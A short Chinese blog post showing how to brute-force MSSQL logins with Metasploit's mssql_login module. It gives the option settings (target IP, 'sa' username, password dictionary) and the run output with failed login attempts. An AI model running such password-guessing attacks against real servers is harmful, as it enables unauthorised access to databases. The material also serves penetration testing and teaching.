MSF爆破MSSQL

Posted nul1

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MSF爆破MSSQL相关的知识,希望对你有一定的参考价值。

show options:

 

msf auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting                           Required  Description
   ----                 ---------------                           --------  -----------
   BLANK_PASSWORDS      false                                     no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                                         yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false                                     no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false                                     no        Add all passwords in the current database to the list
   DB_ALL_USERS         false                                     no        Add all users in the current database to the list
   PASSWORD                                                       no        A specific password to authenticate with
   PASS_FILE            /home/i3ekr/Desktop/dict/pass-top100.txt  no        File containing passwords, one per line
   RHOSTS               10.40.21.28                               yes       The target address range or CIDR identifier
   RPORT                1433                                      yes       The target port (TCP)
   STOP_ON_SUCCESS      false                                     yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false                                     yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                                         yes       The number of concurrent threads
   USERNAME             sa                                        no        A specific username to authenticate as
   USERPASS_FILE                                                  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false                                     no        Try the username as the password for all users
   USER_FILE                                                      no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false                                     yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true                                      yes       Whether to print output for all attempts

msf auxiliary(scanner/mssql/mssql_login) > run 

[*] 10.40.21.28:1433      - 10.40.21.28:1433 - MSSQL - Starting authentication scanner.
[!] 10.40.21.28:1433      - No active DB -- Credential data will not be saved!
[-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\\sa:123456 (Incorrect: )
[-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\\sa:npdx123! (Incorrect: )

 

以上是关于MSF爆破MSSQL的主要内容,如果未能解决你的问题,请参考以下文章

msf爆破

msf中mssql扫描以及漏洞利用模块

提高sqlmap爆破效率

sql MSSQL片段

方便调试使用的代码片段

mssql弱口令的利用